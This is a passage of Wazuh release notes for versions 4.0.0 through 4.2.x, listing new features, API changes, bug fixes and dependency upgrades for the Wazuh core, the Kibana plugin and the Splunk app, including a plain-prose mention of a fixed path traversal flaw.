  • #7731 Vulnerability Detection capabilities are now improved by adding new Vulnerability Detector reports to the Wazuh database so you can know which CVE affect an agent.

  • #8755 Newly added option allows you to enable or disable listening to Authd TSL port.

  • #6912 Wazuh daemons are now renamed to follow the Wazuh unified standard.

  • #6903 Wazuh CLIs and related tools are now renamed to follow Wazuh unified standard.

  • #6920 Wazuh internal directories are now renamed to follow Wazuh unified standard.

  • #6759 Wazuh improvement prevents a condition in FIM from possibly causing a memory error.

  • #6828 FIM now switches from who-data to real-time mode when Audit is in immutable mode.

  • #7317 Active Response protocol changed to receive messages in JSON format that include the full alert.

  • #7264 References in logs are now changed to include Wazuh product name.

  • #7541 Remoted now supports both TCP and UDP protocols simultaneously.

  • #7595 Unit tests for the os_net library are now improved in functionality and consistency.

  • #6999 FIM now removes the Audit rules when their corresponding symbolic links change their target.

  • #7797 Compilation from sources now downloads the prebuilt external dependencies. This improvement helps to consume fewer resources and eliminates overhead.

  • #7807 The old implementation of logtest is restored and renamed as wazuh-logtest-legacy, improving functionality.

  • #7974 Wazuh adds performance improvements to Analysisd when running on multi-core hosts.

  • #8021 Agents now notify the manager that they are stopping. This allows the manager to log an alert and immediately set their state to "disconnected".

  • #7327 Wazuh building process is now independent of the installation directory. With this improvement, the embedded Python interpreter is now provided in a preinstalled, portable package, and the Wazuh resources are now accessed via a relative path to the installation directory.

  • #8201 In the Security configuration assessment module, the error log message shown when the agent cannot connect to the SCA queue is now changed to a warning message to redefine its severity.

  • #8921 The agent now validates the Audit connection configuration when enabling who-data for FIM on Linux.

  • #7175 The /etc/ossec-init.conf file no longer exists.

  • #7398 Unused files are removed from the repository, including TAP tests.

  • #7379 Syscollector now synchronizes its database with the manager, avoiding full data delivery on each scan.

API

  • #7200 Wazuh adds a new endpoint to get agent statistics from different components.

  • #7588 Wazuh adds a new endpoint to modify the user’s allow_run_as flag, allowing you to enable or disable the parameter.

  • #7647 Wazuh adds a new endpoint to get CVE data on affected agents. You can now query the vulnerability data of any agent.

  • #7803 A new API configuration validator is now added to improve validation checking processes.

  • #8115 Wazuh adds the capability that allows you to disable the max_request_per_minute API configuration option by setting its value to 0.

  • #6904 Ruleset versions for GET /cluster/{node_id}/info and GET /manager/info are deprecated and removed.

  • #6909 POST /groups endpoint is now changed to specify the group name in a JSON body instead of a query parameter.

  • #7312 PUT /active-response endpoint function is now changed to create messages with new JSON format.

  • #6366 The DELETE/agents query now integrates new parameters that allow you to easily remove agents that belong to a group. With this improvement, the older_than field is also removed from the response.

  • #7909 Login security controller is improved to avoid errors in Restful API reference links.

  • #8123 The PUT /agents/group/{group_id}/restart response format is now improved when there are no agents assigned to the group.

  • #8149 Agent keys used when adding agents through the Wazuh API are now obscured in the API log.

  • #8457 All agent-restart function of endpoints is now improved by removing the active-response check.

  • #8615 The performance of API request processing time is optimized by applying cache to token RBAC permissions extraction. Now, this process is invalidated if any resource related to the token is modified.

  • #8841 Wazuh default value set for the limit API parameter is 500, but now you can specify the maximum value to 100000.

  • #7588 The allow_run_as parameter is now removed from endpoints to create and update API users.

  • #7006 The behind_proxy_server option is now removed from configuration.

Framework

  • #8682 This enhancement improves the agent insertion algorithm when Authd is not available.

  • #6904 update_ruleset script is now deprecated and removed.

Ruleset

  • #7100 Wazuh now provides decoder support for UFW (Uncomplicated Firewall) and its log format. This improvement ensures the correct processing of Ubuntu default firewall logs.

  • #6867 The ruleset is updated and normalized to follow the Wazuh unified standard.

  • #7316 CIS policy "Ensure XD/NX support is enabled" is restored for SCA.

External dependencies

  • #8886 Boto3, botocore, requests, s3transfer, and urllib3 Python dependencies are now upgraded to their latest stable versions.

  • #9389 Python is now updated to the latest stable version 3.9.6.

  • GCP dependencies and pip are now upgraded to their latest stable versions.

  • python-jose is upgraded to version 3.1.0.

  • Wazuh now adds tabulate dependency.

Resolved issues

This release resolves known issues.

Cluster

Reference

Description

#6736

Memory usage is now optimized and improved when creating cluster messages.

#8142

Error when unpacking incomplete headers in cluster messages is now fixed. Now cluster communication works correctly and the process is completed successfully.

#8499

When iterating a file listed that is already deleted, the error message is now changed and shown as a debug message.

#8901

An issue with cluster timeout exceptions is now fixed.

#8872

An issue with KeyError that occurred when an error command is received in any cluster node is now fixed.

Core

Reference

Description

#6934

In FIM, setting scan_time to 12am or 12pm now works correctly.

#6802

In FIM, reaching the file limit no longer creates wrong alerts for events triggered in a monitored folder. Now, a new SQLite query fetches the information of all the files in a specific order.

#7105

The issue in Analysisd that reserved the static decoder field name command but was not evaluated is resolved. From now on, it is always treated as a dynamic decoder field.

#7073

The evaluation of fields in the description tag of roles now works correctly.

#6789

In FIM, errors that caused symbolic links not to work correctly are now fixed.

#7018

Path validation in FIM configuration is now fixed. Now, the process to validate and format a path from configuration is performed correctly.

#7018

The issue with ignore option in FIM where relative paths are not resolved is now fixed.

#7268

The issue in FIM that wrongly detected that the file limit was reached is now fixed and nodes_count database variable is checked correctly.

#7265

Alerts are now successfully generated in FIM when a domain user deletes a file.

#7359

Windows agent compilation with GCC 10 is now performed successfully.

#7332

Errors in FIM when expanding environment variables are now fixed.

#7476

Rule descriptions are now included in archives when the input event matches a rule, regardless of whether an alert was triggered or not.

#7495

The regex parser is fixed and it now accepts empty strings.

#7414

In FIM, an issue with delete events with real-time is now fixed. Now, deleted files in agents running on Solaris generate alerts and are correctly reported.

#7633

In Remoted, the priority header is no longer included incorrectly in Syslog when using TCP.

#7782

A stack overflow issue in the XML parsing is now fixed by limiting the levels of recursion to 1024.

#7795

Vulnerability Detector now correctly skips scanning all the agents in the master node that are connected to another worker.

#7858

Wazuh database synchronization module now correctly cleans dangling agent group files.

#7919

In Analysisd, a regex parser issue with memory leaks is now fixed.

#7905

A typo is fixed in the initial value for the hotfix scan ID in the agents' DB schema.

#8003

A segmentation fault issue is fixed in Vulnerability Detector when parsing an unsupported package version format.

#7990

In FIM, false positives were triggered due to file inode collisions in the engine DB. This issue is now fixed and FIM works properly when the inode of multiple files is changed.

#6932

An issue with error handling when wildcarded RHEL feeds are not found is now fixed.

#7862

The equals comparator is fixed for OVAL feeds in Vulnerability Detector. Now, equal versions in the OVAL scan are successfully compared.

#8098 #8143

In FIM, an issue that caused a Windows agent to crash when synchronizing a Windows Registry value that starts with a colon : is now resolved. winagent no longer crashes during the synchronization of registries.

#8151

A starving hazard issue in the Wazuh DB is fixed and there are no longer risks of incoming requests being stalled during database commitment.

#8224

An issue with race condition in Remoted that, under certain circumstances, crashes when closing RID files is now fixed. Remoted now locks the KeyStore in writing mode when closing RIDs.

#8789

This fix resolves a descriptor leak issue in the agent when it failed to connect to Authd.

#8828

An issue related to a potential error caused by a delay in the creation of Analysisd PID file when starting the manager is now fixed.

#8551

An invalid memory access hazard issue is fixed In Vulnerability Detector.

#8571

When the agent reports a file with an empty ACE list, it no longer causes an error at the manager in the FIM decoder.

#8620

This fix prevents the agent on macOS from getting corrupted after an operating system upgrade.

#8357

An error is fixed in the manager that prevented its configuration to be checked after a change by the API when Active response is disabled.

#8630

When removing an agent, the manager now correctly removes remote counters and agent group files.

#8905

This fix in the agent on Windows resolves the issue that might cause the FIM DB to be corrupted when disabling the disk sync.

#9364

Logcollector on Windows no longer crashes when handling the position of the file.

#9285

In Remoted, a buffer underflow hazard when handling input messages is now fixed.

#9547

In the agent, an issue that tried to verify the WPK CA certificate even when verification was disabled is now fixed.

API

Reference

Description

#7587

API messages for agent upgrade results are fixed and improved.

#7709

An issue with wrong user strings in API logs is fixed when receiving responses with status codes 308 or 404.

#7867

Newly added variable fixes API errors when cluster is disabled and node_type is worker.

#7798

API integration test mapping script is now updated, fixing redundant paths and duplicated tests.

#8014

API integration test case test_rbac_white_all no longer fails and a new test case for the enable/disable run_as endpoint is added for improved consistency.

#8148

An issue related to thread race condition when adding or deleting agents without authd is now fixed.

#8496

CORS (cross-origin resource sharing) is now fixed in API configuration, allowing lists to be added to expose_headers and allow_headers.

#8887

An issue related to api.log is fixed to avoid unhandled exceptions on API timeouts.

Ruleset

Reference

Description

#7837

usb-storage-attached regex pattern is now improved to support blank spaces.

#7645

SCA checks for RHEL 7 and CentOS 7 are now fixed.

#8111

Match criteria for AWS WAF rules are now fixed and improved.

Wazuh Kibana plugin
What's new

This release includes new features or enhancements.

  • #1434 A new Ruleset Test tool is added under the Tools menu and in the action bar of the Edit Rules and Edit Decoders sections. You can now test sample logs directly on the Wazuh user interface and see how the ruleset reacts to specific log messages.

  • #1434 Dev Tools feature is now moved under the new Tools menu and it is renamed as API Console.

  • #3056 Wazuh adds a new Stats section on the Agent data overview page that allows you to see the agent information retrieved by /agents/{agent_id}/stats/logcollector API endpoint.

  • #3069 A new vulnerability inventory is now added to the Vulnerability module, allowing you to see data on the CVE that affect your monitored agents.

  • #2925 In the Security events module, the Rows per page option of the Explore agent section is now configurable.

  • #3051 New reminder message and restart button are now displayed in the Rules, Decoders, and CDB lists sections of the management menu for you to restart the cluster or management after importing a file.

  • #3061 The API Console feature of the Tools menu now includes a logtest PUT sample for you to have as a reference.

  • #3109 A new button is added for you to recheck the API connection during a health check.

  • #3111 Wazuh adds a new wazuh-statistics template and new mapping for the indices.

  • #3126 When you deploy a new agent, a new link to the Wazuh documentation is added under the Start the agent step of the process for you to check if the connection to the manager is successful after adding a new agent.

  • #3238 When you deploy a new agent, a warning message is shown under the Install and enroll the agent step of the process to warn you about running the command on a host with an agent already installed. This action causes the agent package to be upgraded without enrolling the agent.

  • #2892 In the Integrity monitoring module, the Top 5 users result table is now changed to improve user experience.

  • #3080 The editing process of the allow_run_as user property is now adapted to the new PUT /security/users/{user_id}/run_as endpoint.

  • #3046 Some ossec references are now renamed to follow Wazuh unified standard.

Resolved issues

This release resolves known issues.

Wazuh Kibana plugin

Reference

Description

#3088

Only authorized agents are shown in the Agents stats and Visualizations dashboard.

#3095

Pending status option for agents is now included on the Agents overview page.

#3097

Index pattern setting is now applied when choosing from existing patterns.

#3108

An issue with space character missing on the deployment command when UDP is configured is now fixed.

#3110

When a node is selected in the Analysis Engine section of the Statistics page, you can now correctly see the statistics of the selected node.

#3114

When selecting a MITRE technique in the MITRE ATTACK module, the changed date filter of the flyout window no longer modifies the main date filter as well.

#3118

An issue with the name of the TCP sessions visualization is now fixed and the average metric is now changed to total TCP sessions.

#3120

Only authorized agents are correctly shown on the Events and Security alerts tables.

#3122

In the Agents module, Last keep alive data is now displayed correctly within the panel.

#3128

Wazuh Kibana plugin no longer redirects to the Settings page instead of the Overview page after a health check.

#3144

An issue with the Wazuh logo path in the Kibana menu when server.basePath setting is used is now fixed.

#3152

An issue related to a deprecated endpoint for creating agent groups is now fixed.

#3163

This fix resolves the issue caused when checking process for TCP protocol in Deploy a new agent window.

#3181

An issue with RBAC with agent group permissions is fixed. Now, when authorized agents are specified by their group instead of their IDs, you can successfully access the Security configuration assessment module, the Integrity monitoring module, and the Configuration window on the Agents page.

#3232

The index pattern is now successfully created when performing the health check, preventing an API-conflict error during this process.

#3569

Windows updates section is no longer displayed incorrectly when generating PDF reports for Linux agent inventories.

#3574

Error logging is now improved and some unnecessary error messages are removed.

Wazuh Splunk app
What's new

This release includes new features or enhancements.

  • #1024 In Discover view, the search query is changed to show the alert’s evolution.

  • #1066 In the Agents window of the Groups page, a new link is added to the result table to access Agent view.

  • #1052 Wazuh is now compatible with Python3. Python2 is now deprecated and removed.

  • #1058 The create group POST request is adapted to the latest Wazuh API changes.

Resolved issues

This release resolves known issues.

Splunk

Reference

Description

#944

Wazuh tools are now renamed to follow Wazuh unified standard. ossec-control is now wazuh-control and ossec-regex is now renamed as wazuh-regex.

#945

Wazuh daemons are now renamed to follow Wazuh unified standard.

#1020

An issue related to token cache duration is now fixed.

#1042

An issue with dynamic column's width for agents PDF report is now fixed.

#1045

The issue related to the app not loading when it is not connected to the API is now fixed and information is displayed correctly.

#1046

A styling issue with success toast message for saving agent configuration is now fixed.

#1059

A minor styling issue is now fixed and Export button on the Export Results window now works correctly when you hover over it.

#1063

A new error handler message is now added to the Alerts window of the Configuration page.

#1069

The error message that appears when adding an API and the connection fails is now fixed and the message content text is shown correctly.

#1021

An issue with the error toast message in search handler is fixed when the connection with forwarder fails.

Changelogs

More details about these changes are provided in the changelog of each component:

4.1.5 Release notes - 22 April 2021

This section lists the changes in version 4.1.5. More details about these changes are provided in the changelog of each component:

Wazuh core
Resolved issues

Reference

Description

4cbd1e8

Issue is fixed in Vulnerability Detector that made modulesd crash while updating the NVD feed due to a missing CPE entry.

Wazuh Kibana plugin
What's new
  • Wazuh Kibana plugin is now compatible with Wazuh 4.1.5.

Wazuh Splunk app
What's new
  • Wazuh Splunk app is now compatible with Wazuh 4.1.5.

4.1.4 Release notes - 25 March 2021

This section lists the changes in version 4.1.4. More details about these changes are provided in the changelog of each component:

Wazuh core
Resolved issues

This release resolves known issues.

Cluster

Reference

Description

#8017

Issue with the Wazuh manager worker nodes reconnection after restarting the Wazuh master node is fixed. Workers now successfully reconnect to the master node after it is restarted.

Wazuh Kibana plugin
What's new

This release includes new features or enhancements.

  • Wazuh Kibana plugin is now compatible with Wazuh 4.1.4.

4.1.3 Release notes - 23 March 2021

This section lists the changes in version 4.1.3. More details about these changes are provided in the changelog of each component:

Wazuh core
What's new

This release includes new features or enhancements.

External dependencies:

  • #7943 Python is upgraded from 3.8.6 to 3.9.2. This upgrading includes several Python dependencies to be compatible with the latest stable version.

Resolved issues

This release resolves known issues.

Core

Reference

Description

#7870

In File Integrity Monitoring, the issue with files' modification time on Windows is fixed. That prevents the agent from producing this error: ERROR: (6716): Could not open handle for 'c:\test\untitled spreadsheet.xlsx'. Error code: 32

#7873

Issue in Wazuh DB that truncated the output of the agents' status query towards the cluster is fixed.

API

Reference

Description

#7906

Validation for absolute and relative paths is modified to avoid inconsistencies. These changes in the validator.py module improve security verifications of paths.

Wazuh Kibana plugin
What's new

This release includes new features or enhancements.

  • #2985 In the Settings module, you can now create and configure a new index pattern after changing the default one. This improves user experience when retrieving data from indices for queries and visualizations.

  • #3039 In the Agents module, the node name information is now detailed in the agents' list and in the agent information section. With this enhancement, you can better visualize the cluster node to which each agent is reporting.

  • #3041 A new loading view is displayed when the user is logging some tabs. This improves user experience since permission prompts are no longer shown while updating a tab.

  • #3047 All date labels are changed to Kibana formatting time zone for consistency.

  • #3048 Custom messages are now added for each possible run_as setup. This improves the warning messages whenever run_as is not allowed.

  • #3049 When selecting a default API, the toast message is cleaner and shows the API host ID.

Resolved issues

This release resolves known issues.

Reference

Description

#3028

In Role mapping, the issue that caused unnecessary operators to be added when editing the role mapping is now fixed and no longer affects usability.

#3057

Issue with rule filter not applied when selecting a Rule ID in another module is now fixed. Now, the selected Rule ID is correctly applied throughout all modules.

#3062

Issue with changing master node configuration is now fixed. Now, the Wazuh API connection checking is completed successfully and no longer triggers an error when changing the configuration of the master node.

#3063

Issue with Wazuh crashing after reloading due to caching bundles is now fixed. Improved validations now prevent this issue from reoccurring.

#3066

Wrong variable declaration for macOS agents is now fixed.

#3084

Improved error handling when an invalid rule is configured. The file saving algorithm now prevents files with incorrect configurations from being saved.

#3086

Some errors in the Events table are now fixed. Action buttons of the rule.mitre.tactic column are repositioned correctly and Event links work after you add, remove, or move a column.

4.1.2 Release notes - 8 March 2021

This section lists the changes in version 4.1.2. More details about these changes are provided in the changelog of each component:

Wazuh core
Changed

Core

  • The default value of the agents_disconnection_time is set to 10 minutes, preventing false-positives alerts of disconnected agents.

  • In Remoted, the warning log of messages sent to disconnected agents is now changed to level-1 debug log.

API

  • API logs showing request parameters and body are now generated with API log level info instead of log level debug.

External dependencies

  • aiohttp is upgraded from 3.6.2 to 3.7.4.

Fixed
  • Issue with unit tests that randomly caused false failures is fixed.

  • Analysisd configuration now applies the json_null_fields setting successfully.

  • In Remoted, the ipv6 option checking ignores invalid values correctly.

  • Issue with rids_closing_time option checking in Remoted is now fixed.

Wazuh Kibana plugin
Changed
  • Some empty state messages have been improved.

  • The example host configuration in Add new API section now includes the setting run_as.

Fixed
  • SCA policy detail no longer shows name and check results of another policy.

  • Alerts are now correctly displayed in the alerts table when switching pinned agents.

  • In Role mapping, issue with data loading and Create Role mapping button is now fixed.

  • Pagination in SCA checks table when expanding a row now works correctly.

  • Issue with agent table showing suggestions with manager information is now fixed.

  • Loading of inventory is now disabled when a request fails.

  • Single nodes can be restarted using optional node-name parameter in cluster restart requests.

  • Pinned agents successfully trigger new filtered queries.

  • Issue with overlay of Wazuh menu when Kibana menu is opened or docked is now fixed.

4.1.1 Release notes - 25 February 2021

This section lists the changes in version 4.1.1. More details about these changes are provided in the changelog of each component:

Wazuh core
Added

External dependencies

  • Added cython (0.29.21) library to Python dependencies.

  • Added xmltodict (0.12.0) library to Python dependencies.

Changed

External dependencies

  • Upgraded Python version from 3.8.2 to 3.8.6.

  • Upgraded Cryptography python library from 3.2.1 to 3.3.2.

  • Upgraded cffi python library from 1.14.0 to 1.14.4.

API

  • Added raw parameter to GET /manager/configuration and GET cluster/{node_id}/configuration endpoints to load ossec.conf in XML format.

Fixed

API

  • An error with the RBAC permissions in the GET /groups endpoint.

  • A bug with Windows registries when parsing backslashes.

  • An error with the RBAC permissions when assigning multiple agent:group resources to a policy.

  • An error with search parameters when using special characters.

AWS Module

  • A bug that caused an error when attempting to use an IAM Role with CloudWatchLogs service.

Framework

  • A race condition bug when using RBAC expand_group function.

  • The migration process to overwrite default RBAC policies.

Core

  • A bug in the Windows agent that did not respect the buffer EPS limit.

  • A bug in Integratord that might lose alerts from Analysisd due to a race condition.

  • Silenced the error message when the Syslog forwarder reads an alert with no rule object.

  • A memory leak in Vulnerability Detector when updating NVD feeds.

  • Prevented FIM from raising false positives about group name changes due to a thread unsafe function.

Removed

API

  • Deprecated /manager/files and /cluster/{node_id}/files endpoints.

Wazuh Kibana plugin
Added
  • New prompt to show unsupported module for the selected agent.

  • Added an X-Frame-Options header to the backend responses.

Changed
  • Added toast with refresh button when new fields are loaded in dashboard.

  • Migrated the Wazuh API endpoints for manager and cluster files and their corresponding RBAC.

  • Enhanced generic statusCode error message to be more user friendly.

Fixed
  • A login error when AWS Elasticsearch and ODFE are used.

  • An error message that was displayed when changing a group configuration even when the user had the right permissions.

  • Disabled switch visual edit button when JSON content is empty in Role Mapping.

  • Disappearing menu and blank content when an unsupported agent (OS) is selected.

  • Forcing a non-numeric filter value in a number type field applying a filter in the search bar of dashboards and events.

  • Wrong number of alerts that were shown in Security Events.

  • Search using uncommon characters in Management groups of agents.

  • The SCA policy stats that did not refresh.

  • AWS index fields loading even when no AWS alerts were found.

  • Date fields format in FIM and SCA modules.

  • Recurrent error message in Manage agents when the user has no permissions.

  • An issue that prevented from editing empty rules and decoders files that already existed in the Wazuh manager.

  • Support for alerts index pattern with different IDs and names.

  • The unpin button in the selection modal of agents in the menu.

  • Close Wazuh API session when logging out from UI.

  • Missing && in macOS agent deployment command.

  • Prompt permissions on Mitre > Framework and Integrity monitoring > Inventory.

4.1.0 Release notes - 15 February 2021

This section lists the changes in version 4.1.0. More details about these changes are provided in the changelog of each component:

Highlights
  • Added support for regular expressions negation and PCRE2 format in rules and decoders.

  • New ruleset test module managed by the analysis daemon allowing testing sessions of rules and decoders.

  • New upgrade module that provides simultaneous agent upgrades in a single node or cluster architecture.

  • The Vulnerability Detector now supports macOS agents. These agents must be updated to 4.1 to scan vulnerabilities.

  • Support for AWS load balancers logs: Application Load Balancer, Classic Load Balancer, and Network Load Balancer.

  • Removed the limit on the number of agents a manager can support.

  • New endpoints to query and manage Rootcheck data.

  • Support for Open Distro for Elasticsearch 1.12.0.

  • Support for Elastic Stack basic license 7.10.0 and 7.10.2.

Wazuh core
Added

Core

  • Negation logic for rules.

  • Support for PCRE2 regular expressions in rules and decoders.

  • New ruleset test module managed by the analysis daemon allowing testing sessions of rules and decoders.

  • New upgrade module that provides simultaneous agent upgrades in a single node or cluster architecture. WPK upgrade functionality has been moved to this module.

  • New task module that collects and manages all the upgrade tasks executed in the agents or managers.

  • Let the time interval to detect that an agent got disconnected configurable. Deprecate parameter DISCON_TIME.

  • Vulnerability Detector support for macOS.

  • Capability to perform FIM on values in the Windows Registry.

API

  • New endpoints to query and manage rootcheck data.

  • New endpoint to check task status.

  • New endpoints to run the logtest tool and delete a logtest session.

  • debug2 mode for API log and improved debug mode.

AWS module

  • Support for AWS load balancers logs: Application Load Balancer, Classic Load Balancer, and Network Load Balancer.

Framework

  • New framework modules to use the logtest tool.

  • Improved q parameter on rules, decoders, and cdb-lists modules to allow multiple nested fields.

Changed

Core

  • Removed limit on the number of agents that a manager can support.

  • Migration of rootcheck results to Wazuh DB to remove the files with the results of each agent.

  • New mechanism to close RIDS files when agents are disconnected.

  • Moved CA configuration section to verify WPK signatures from the active-response section to the agent-upgrade section.

  • The ossec-logtest tool is deprecated and replaced by wazuh-logtest, which uses a new testing service integrated in Analysisd.

  • Modified the error message to debug when multiple daemons attempt to remove an agent simultaneously.

  • Replaced the error message with a warning when the agent fails to reach a module.

API

  • The status parameter behavior in the DELETE /agents endpoint to enhance security.

  • Allow agent upgrade endpoints to accept a list of agents, maximum 100 agents per request.

  • Improved input validation regexes for names and array_names.

Framework

  • Refactored framework to work with the new upgrade module.

  • Refactored agent upgrade CLI to work with the new upgrade module. It distributes petitions in a clustered environment.

  • Rule and decoder details structure to support PCRE2.

  • Refactored framework to adapt agent status changes in wazuh.db.

  • Improved the performance of AWS Config integration by removing alert fields with variables such as Instance ID in its name.

Fixed

Core

  • An error in analysisd when getting the ossec group ID.

  • Prevented FIM from reporting configuration error when patterns in settings match no files.

  • The array parsing when building JSON alerts.

  • Added Firefox ESR to the CPE helper to distinguish it from Firefox when looking for vulnerabilities.

  • The evaluation of packages from external sources with the official vendor feeds in Vulnerability Detector.

  • The handling of duplicated tags in the Vulnerability Detector configuration.

  • The validation of hotfixes gathered by Syscollector.

  • The reading of the Linux OS version when /etc/os-release does not provide it.

  • A false positive when comparing the minor target of CentOS packages in Vulnerability Detector.

  • A zombie process leaks in modulesd when using commands without a timeout.

  • A race condition in Remoted that might create agent-group files with wrong permissions.

  • A warning log in Wazuh DB when upgrading the global database.

  • A bug in FIM on Windows that caused false positives due to changes in the host timezone or the daylight saving time when monitoring files in a FAT32 filesystem.

API

  • An error with /groups/{group_id}/config endpoints (GET and PUT) when using complex localfile configurations.

Framework

  • A cluster_control bug that caused an error message when running wazuh-clusterd in foreground.

Wazuh Kibana plugin
Added
  • Check the Kibana max buckets config by default in health-check and increase them.

  • A warning in the role mapping section if the run_as setting is disabled.

  • A label to indicate that the wui_ rules only apply to the wazuh-wui API user.

Changed
  • Adapted the Wazuh Kibana plugin to the new Kibana platform.

  • Wazuh config directory moved from /usr/share/kibana/optimize to /usr/share/kibana/data Kibana directory.

  • Support on FIM Inventory Windows Registry for the new scheme with registry_key and registry_value from syscheck.

  • Uncheck agents after an action in agents groups management.

  • Unsave rule files when editing or creating a rule with invalid content.

  • Replaced Wazuh API user with wazuh-wui in the default configuration.

  • Add agent id to the reports name in Agent Inventory and Modules.

  • Allow access to the Agents section with agent:group resource permission.

  • Added vulnerabilities module for macOS agents.

Fixed
  • Server error Invalid token specified: Cannot read property 'replace' of undefined.

  • Show empty rules and decoders files.

  • Wrong hover texts in CDB list actions.

  • Access to forbidden agents information when exporting agents list.

  • The complex search using the Wazuh API query filter in search bars.

  • Validation to check if userPermissions are not ready yet.

  • Agents table OS field sorting: Changed agents table field os_name to os.name,os.version to make it sortable.

  • Different parsed datetime between agent detail and agents overview table.

  • An error with the agents status pie chart tooltip that did not display the number of agents on the first hover.

  • Menu crash when Solaris agents are selected.

  • Report's creation dates set to 1970-01-01T00:00:00.000Z in some OS.

  • Missing commands for Ubuntu/Debian and CentOS on the Deploy new agent section.

  • Different hours displayed on Alerts List section in some dashboards.

  • Permissions to access agents when policy agent:read is set.

  • SCA permissions for agents views and dashboards.

  • Settings of statistics indices creation that did not work properly.

Wazuh ruleset
Added
  • The ruleset update tool is now able to bypass the version check with the force option.

  • New AWS Config-History rules to make it more granular by including every item status supported.

  • Several hundred new SCA policies for various operating systems.

Changed
  • FIM rules have been adapted to the improvements for Windows Registry monitoring.

Fixed
  • Updated MITRE techniques in web rules.

  • Sonicwall predecoder to accept whitespaces at the beginning.

4.0.4 Release notes - 14 January 2021

This section lists the changes in version 4.0.4. More details about these changes are provided in the changelog of each component:

Wazuh core
Added

API

  • Missing secure headers for API responses to fulfill the OWASP recommendations.

  • New option to disable uploading configurations containing remote commands.

  • New option to choose the SSL ciphers. Default value TLSv1.2.

Changed

API

  • Restore and update API configuration endpoints have been deprecated.

  • JWT token expiration time set to 15 minutes.

Fixed

API

  • Fixed a path traversal flaw (CVE-2021-26814) affecting 4.0.0 to 4.0.3 at /manager/files and /cluster/{node_id}/files endpoints. This vulnerability allowed authenticated users to execute arbitrary code with administrative privileges via /manager/files URI. An authenticated user to the service could exploit incomplete input validation on the /manager/files API to inject arbitrary code within the API service script. Thanks to Davide Meacci for reporting this vulnerability.

Framework

  • Bug with client.keys file handling when adding agents without authd.

Core

  • The purge of the Redhat vulnerabilities database before updating it.

Wazuh Kibana plugin
Added
  • Support for Wazuh v4.0.4.

4.0.3 Release notes - 30 November 2020

This section lists the changes in version 4.0.3. More details about these changes are provided in the changelog of each component:

Wazuh core
Fixed

API

  • API timeouts with GET /agents call in loaded cluster environments.

  • Timeout issue related with GET /manager/configuration/validation and GET /cluster/configuration/validation in big environments.

  • Timeout and performance issue related with GET /overview agents request in loaded cluster environments.

Wazuh Kibana plugin
Added
  • Support for Wazuh v4.0.3.

4.0.2 Release notes - 24 November 2020

This section lists the changes in version 4.0.2. More details about these changes are provided in the changelog of each component:

Wazuh core
Added

Core

  • Version detection in the agent for macOS Big Sur.

Changed

API

  • GET /agents/summary/os, GET /agents/summary/status and GET /overview/agents will no longer consider 000 as an agent.

  • Increased to 64 the maximum number of characters that can be used in security users, roles, rules, and policies names.

Fixed

API

  • Error with POST /security/roles/{role_id}/rules when removing role-rule relationships with admin resources.

  • Timeout error with GET /manager/configuration/validation when using it in a slow environment.

Framework

  • Error with some distributed requests when the cluster configuration is empty.

  • Special characters in default policies.

Core

  • Bug in Remoted that limited the maximum agent number to MAX_AGENTS-3 instead of MAX_AGENTS-2.

  • Error in the network library when handling disconnected sockets.

  • Error in FIM when handling temporary files and registry keys exceeding the path size limit.

  • Bug in FIM that stopped monitoring folders pointed by a symbolic link.

  • Race condition in FIM that could cause Syscheckd to stop unexpectedly.

Wazuh Kibana plugin
Added
  • Support for Wazuh v4.0.2.

Changed
  • An alert summary table is now included in PDF reports of all modules.

  • Authentication with run_as is now available for other users besides wazuh-wui.

  • A notification is now displayed when no agents have been registered.

  • API security entities between 0 and 99 are now reserved.

Fixed
  • Manager restart in rule editor with Wazuh cluster enabled.

  • Restored the tables in the agents reports.

  • Corrected the subtraction of managers (agent 000) in agent count considering the RBAC permissions of the current user.

  • Changes done via a worker API were overwritten.

  • Default user field in Security Role mapping is now provided depending on whether ODFE or X-Pack is installed.

  • Bug that replaced index-pattern title with its ID during the updating process.

4.0.1 Release notes - 11 November 2020

This section lists the changes in version 4.0.1. More details about these changes are provided in the changelog of each component:

Wazuh core
Changed

Framework

  • Updated Python cryptography library to version 3.2.1.

Fixed

API

  • Added missing agent:group resource to the RBAC catalog. This prevented the Wazuh Kibana plugin from obtaining the correct information from the RBAC catalog.

  • Changed limit parameter behavior in GET sca/{agent_id}/checks/{policy_id} endpoint and fixed some information loss when paginating wdb.

  • Fixed an error with GET /security/users/me when logged in with run_as. This endpoint must return the permissions and information of the user who makes the request. However, when the user was authenticated through auth_context, this endpoint did not return the permissions granted by this method.

Framework

  • Fixed zip files compression and handling in cluster integrity synchronization.

Core

  • Fixed version matching when assigning a feed in the Vulnerability Detector.

  • Improved permissions on Windows agent. Users with limited privileges will now be unable to read the contents of the Wazuh agent folder.

  • Fixed a bug that may lead the agent to crash when reading an invalid Logcollector configuration.

Wazuh Kibana plugin
Added
  • Support for Wazuh v4.0.1.

Fixed
  • Fixed icons that did not align correctly in Modules > Events.

  • Fixed statistics visualizations that did not show data.

  • Fixed error on loading CSS files.

  • Fixed search filter in the search bar in Module/SCA that was not working.

Wazuh ruleset
Fixed
  • Removed duplicated Windows rules for EventChannel. These extra rules were preventing certain events from triggering alerts.

4.0.0 Release notes - 23 October 2020

This section lists the changes in version 4.0.0. More details about these changes are provided in the changelog of each component:

Highlights
  • The agent enrollment is now performed on the main daemon initialization. There is no need to request a key using an external CLI anymore. Agents are now able to request a key to the manager on their own if no key was defined on startup or if the manager has rejected the connection (Agents in 3.x version are still 100% compatible with 4.x version).

  • Wazuh API RBAC: Configure users, roles, and policies to manage access permissions. Wazuh WUI now permits granular control over access to resources depending on user roles, this will allow enterprises to manage user accounts that fulfill different functions in the security of the environment.

  • Wazuh API is now embedded in the Wazuh manager.

  • Wazuh manager and agents will use TCP as the default communication protocol.

  • The Windows agent MSI installer is now signed using DigiCert instead of GlobalSign. DigiCert is known for being present on more Windows versions including the oldest ones.

  • FIM implements now a set of settings to control the module temporal files disk usage. This means that now we can choose the amount of disk space used by the report change utility. The diff option reports changes in the monitored files, to do so, it creates a compressed copy of the file and checks if it changes. This method may use a lot of disk space. Wazuh 4.0 introduces new capabilities to limit the space used.

Breaking changes
  • The agent-auth tool starts the deprecation cycle (to be deprecated in v5.0.0). The agent registration on demand will still be available using CLI.

  • The API is now embedded in the Wazuh manager, no wazuh-api package will be installed anymore.

  • Wazuh manager and agents are no longer using UDP as the default communication protocol. TCP is enabled by default.

  • OpenSCAP policies removed from RPM and DEB packages. Folder present policies in the agent installation will be removed.

Wazuh core
Added

Wazuh API

  • Embedded Wazuh API with Wazuh Manager, there is no need to install Wazuh API.

  • Migrated Wazuh API server from NodeJS to Python.

